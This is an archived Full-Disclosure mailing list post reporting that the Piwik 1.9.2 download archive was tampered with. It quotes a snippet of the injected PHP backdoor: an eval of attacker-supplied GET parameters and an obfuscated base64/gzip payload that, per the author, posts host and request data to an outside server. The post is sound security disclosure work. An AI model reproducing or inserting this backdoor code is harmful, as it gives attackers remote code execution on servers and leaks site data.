lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <50B3CE75.9060107@grobecker-wtal.de> Date: Mon, 26 Nov 2012 21:17:57 +0100 From: Maximilian Grobecker <max@...becker-wtal.de> To: full-disclosure@...ts.grok.org.uk Subject: Possible infection of Piwik 1.9.2 download archive Hi, this evening I downloaded a fresh archive of Piwik 1.9.2 and found this code at the bottom of the /piwik/core/Loader.php file: (Just a short snippet) -----------snip------------- <?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) { preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit; } if (file_exists(dirname(__FILE__)."/lic.log")) exit; eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s [.......] -----------/snip------------- I decoded some parts of this code and found what it does: It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and the request URI via POST to http://prostoivse.com/x.php and creates a file named "lic.log" in the same directory. As long as this file exists it seems that no further POST requests are made. At the moment I'm trying to figure out the further sense of this code, but it seems that there might also be some kind of backdoor (because of the use of $_GET). The file in the downloadable archive is dated at Nov 26, 2012 / 18:42 UTC. From forums I know that some people downloaded the archive earlier this day and don't have this code inside their files. At the moment (at 8:08 PM UTC) the archive is downloadable at the original Piwik web site with this obfuscated code. I contacted the developers and managers of Piwik a few minutes ago about this. -- Greetings from Wuppertal, Germany Max Grobecker _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists